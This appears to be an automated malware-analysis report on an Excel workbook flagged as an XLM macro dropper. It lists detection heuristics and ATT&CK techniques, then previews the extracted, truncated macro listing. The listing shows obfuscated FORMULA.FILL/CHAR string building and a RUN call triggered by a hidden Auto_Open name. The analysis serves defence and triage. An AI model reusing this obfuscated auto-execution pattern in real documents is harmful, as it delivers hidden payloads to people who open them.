MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains Excel 4.0 macros, including an Auto_Open entry. The macros utilize dangerous functions like RUN, indicating an intent to execute a secondary payload. The presence of an Auto_Open macro suggests it was likely delivered as a spearphishing attachment.
Heuristics 4
-
ClamAV: Xls.Dropper.Agent-7819203-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7819203-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126013 bytes |
SHA-256: 5e4ddbfc88045cb8eba4e2a450c3bfd865b8447f3cfd20f5a2dea5d5aa84dae1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!JC3732 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,IW19,"",74.00000000000000000000 ' Sheet,HB52,"",2.34782508695652181174 ' Sheet,BU67,"",143.00000000000000000000 ' Sheet,BT98,"",54.75000000000000000000 ' Sheet,II206,"",2.94505494505494525015 ' Sheet,HU207,"",95.60007812499999602096 ' Sheet,BR312,"",265.00000000000000000000 ' Sheet,IR357,"",-0.05932203389830508627 ' Sheet,CO374,"",-234.00000000000000000000 ' Sheet,CS462,"",26.75000000000000000000 ' Sheet,BL486,"",-0.14285714285714284921 ' Sheet,FX501,"",3.22891566265060259155 ' Sheet,BA515,"",-1.81896551724137922612 ' Sheet,EI531,"",50.00000000000000000000 ' Sheet,HA599,"",-122.00000000000000000000 ' Sheet,JD604,"",-216.50000000000000000000 ' Sheet,FN759,"",-797.00000000000000000000 ' Sheet,EY815,"",247.50000000000000000000 ' Sheet,BA857,"",28.00000000000000000000 ' Sheet,W868,"",255.50000000000000000000 ' Sheet,BG913,"",3.04225352112676050709 ' Sheet,DM918,"FORMULA.FILL(CHAR(EE39213-CW19422)&CHAR(DD24911-IC29018)&CHAR(BN44843/DQ6127)&CHAR(C41016-FA20976)&CHAR(BN44843+CC2988)&CHAR(DH35863/EI1480)&CHAR(BN44843*BL486)&CHAR(BN44843*EO48290)&CHAR(C41016+GA21821)&CHAR(C41016+HQ35528)&CHAR(EE39213*EM27145)&CHAR(EE39213/Y2564)&CHAR(EE39213-IZ21853)&CHAR(FA61239+IB48810)&CHAR(BN44843*IO11297)&CHAR(FA61239-O48829)&CHAR(EE39213+IS57870)&CHAR(FX54190*BA25768)&CHAR(DD24911/FM24263)&CHAR(DH35863/BC28046)&CHAR(FX54190-FK49896)&CHAR(GR24435/IW54427)&CHAR(C41016+B35844)&CHAR(EE39213*GT46264)&CHAR(GR24435*CO47626)&CHAR(FA15861+FN759)&CHAR(GR24435/FT8445)&CHAR(GR24435-GM59038)&CHAR(DH35863-F64150)&CHAR(FA15861/GO48187)&CHAR(GR24435*IW20200)&CHAR(DH35863/JQ50139)&CHAR(FX54190+DJ11745)&CHAR(FA61239/BY56402)&CHAR(C41016-BT98)&CHAR(EE39213*GN45618)&CHAR(DH35863*DN8393)&CHAR(FA61239*CY15555)&CHAR(GR24435-IL42901)&CHAR(DH35863*IJ45983)&CHAR(DH35863-HY45980)&CHAR(FA15861+DX38091)&CHAR(BN44843*JL46926)&CHAR(FX54190+IE3498)&CHAR(FX54190-CQ40750)&CHAR(FA15861/IV33183)&CHAR(DD24911+CU45319)&CHAR(FA15861-FY33572)&CHAR(FA15861-S35515)&CHAR(HP39946*BC18661)&CHAR(EE39213+ER24767)&CHAR(DD24911+BO5482)&CHAR(FA15861/ED46740)&CHAR(BN44843+JP27242)&CHAR(BN44843/T36791)&CHAR(GR24435-GA50601)&CHAR(C41016-BL8670)&CHAR(FA61239-C26889)&CHAR(GR24435*BW34747)&CHAR(FX54190/K1799)&CHAR(FA15861+EF11613)&CHAR(DH35863-GQ10237)&CHAR(FA15861-FH48003)&CHAR(EE39213+HU207)&CHAR(DD24911*CS46040)&CHAR(FA15861*JI42580)&CHAR(GR24435*HO51363)&CHAR(DD24911-BM37705)&CHAR(FA61239*JM10609)&CHAR(DD24911+FL60376)&CHAR(FA61239*GS11938)&CHAR(FA15861-CI29651)&CHAR(GR24435+DZ55935)&CHAR(FA15861-K11240)&CHAR(C41016-BG60411)&CHAR(FA15861-GY31569)&CHAR(BN44843-IQ17435)&CHAR(FX54190/CK44021)&CHAR(FX54190+FX57107)&CHAR(FX54190/JT58256)&CHAR(BN44843+HY58152)&CHAR(FA61239*IB9135)&CHAR(EE39213/CL6448)&CHAR(C41016*HV49412)&CHAR(GR24435*GA8735)&CHAR(BN44843*GK24776),IV41589)","" ' Sheet,DM919,RUN(HU64434),"" ' Sheet,IW970,"",-3.43564356435643558640 ' Sheet,JF1031,"",-0.52132701421800953234 ' Sheet,BI1090,"",-39.75000000000000000000 ' Sheet,Z1096,"",5.95555555555555571345 ' Sheet,JG1148,"",-24.25000000000000000000 ' Sheet,JA1153,"FORMULA.FILL(CHAR(DI48393/HU63951)&CHAR(W35809-O49530)&CHAR(HU39982+GY13355)&CHAR(DD29605/BY60382)&CHAR(JQ48790/BS44863)&CHAR(HU39982-HM45178)&CHAR(HU39982/GN15199)&CHAR(W35809/JE28205)&CHAR(JR9-FH8621)&CHAR(GB50993*HN1782)&CHAR(GB50993-FB34798)&CHAR(GB50993/HK24877)&CHAR(HU39982*DC9911)&CHAR(JR9-T48065)&CHAR(HU39982/DU46490)&CHAR(JR9*IP60212)&CHAR(GB50993-EJ23447)&CHAR(DD29605/IV32643)&CHAR(DI48393+FJ11983)&CHAR(GG13989*GD4688)&CHAR(JQ48790-BT51503)&CHAR(DI48393/DV2511)&CHAR(JR9-CZ17910)&CHAR(L38910+FH1796)&CHAR(L38910+EX28495)&CHAR(JQ48790+HB41735)&CHAR(JQ4 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.